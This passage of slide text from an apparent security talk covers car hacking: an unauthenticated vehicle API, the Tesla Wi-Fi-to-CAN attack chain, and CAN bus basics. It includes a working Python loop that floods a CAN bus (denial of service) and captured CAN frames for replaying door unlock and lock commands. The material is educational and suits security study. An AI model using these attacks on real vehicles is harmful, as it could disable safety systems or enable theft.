$ API without Authentication
• GET
https://[redacted].com/orchestration_1111/g
dc/RemoteACRecordsRequest.php?RegionCo
de=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0
U60XXXXX
• VIN : Vehicle Identification Number
Slide 20
Slide 20 text
No content
Slide 21
Slide 21 text
$ Case Study : Wi-Fi
• Black Hat 2017 : Free-fall: Tesla Hacking
Get control
of Wi-fi
Exploit the
Webkit
Browser
Root the
in-vehicle
system
Patch and
Disable
AppArmor
Bypass ECU’s
firmware
integrity
verification
Reprogram
modified
Gateway
firmware
Send malicious
CAN msg on
CAN Bus
Get
Control of
CAN Bus
CID
ECUs
Slide 22
Slide 22 text
Why Hacking the CAN Bus?
Slide 23
Slide 23 text
>_ Intro of CAN Bus
Slide 24
Slide 24 text
$ What is CAN Bus?
• Controller Area Network
• Low cost, integrated controllers
Head light
Tail light
Dash board
Doors
ABS
Engine
Control
Suspension
Control
Gateway
Low Speed CAN
Body Control Bus
High Speed CAN
Powertrain Control Bus
Slide 25
Slide 25 text
$ CAN Data Frame Format
Arbitration
Identifier(ArbID)
11 bits or 29 bits
Data Length Code
(DLC)
4 bits
Data
Up to 8 Byte
Slide 26
Slide 26 text
$ CAN Bus Arbitration
• Support by Hardware
• Software implementation becomes easily and
immediacy.
• priority : 0 > 1
Slide 27
Slide 27 text
$ Fault Confinement
Error
Active
Error
Passive
Bus Off
Reset and Config
REC => 127 or
TEC => 127
TEC > 255
Reset, Config and
Reception of 128x11
Recessive Bits
REC < 127 or
TEC < 127
REC: Receive Error Counter
TEC: Transmit Error Counter
Slide 28
Slide 28 text
>_ Security Issues on CAN Bus
Slide 29
Slide 29 text
$ Denial-of-Service
import ics
device = ics.find_devices()[0]
ics.open_device(device)
NetworkID = ics.NETID_HSCAN
ics.set_bit_rate(device,500000,NetworkID)
msg = ics.SpyMessage() # Setup the message
msg.ArbIDOrHeader = 0x0 # CAN ID
msg.NetworkID = NetworkID # Channel 1 on the ValueCAN
msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
while(1):
ics.transmit_messages(device, msg)
Slide 30
Slide 30 text
$ Testbed
Slide 31
Slide 31 text
$ Result
Slide 32
Slide 32 text
$ Replay Attack
Head light
Tail light
Dash board
Doors
ABS
Engine
Control
Suspension
Control
Gateway
Attacker
Slide 33
Slide 33 text
$ Testbed
Slide 34
Slide 34 text
$ Unlock the Door
ArbID Data…
44D 4D,00,80,00,00,00,00,00
440 40,00,80,11,01,0F,0F,0F
442 42,00,80,00,00,00,00,00
44D 4D,01,80,00,01,00,00,00
440 40,01,80,11,01,00,00,00
631 18,80,53,04,00,12,00,00
Slide 35
Slide 35 text
$ Lock the Door
ArbID Data…
44D 4D,00,80,00,00,00,00,00
440 40,00,80,11,01,0F,0F,0F
442 42,00,80,00,00,00,00,00
44D 4D,01,80,00,01,00,00,00
440 40,01,80,11,01,00,00,00
631 18,80,53,02,00,12,00,00
Slide 36
Slide 36 text
$ Demo
Slide 37
Slide 37 text
>_ Conclusion
• Survey of the Car Security
− The skill of cyber security is useful in Car security.
• CAN Bus
− A useful protocol before the car connect to the
Internet.
− Easy attack by DoS and replay attack.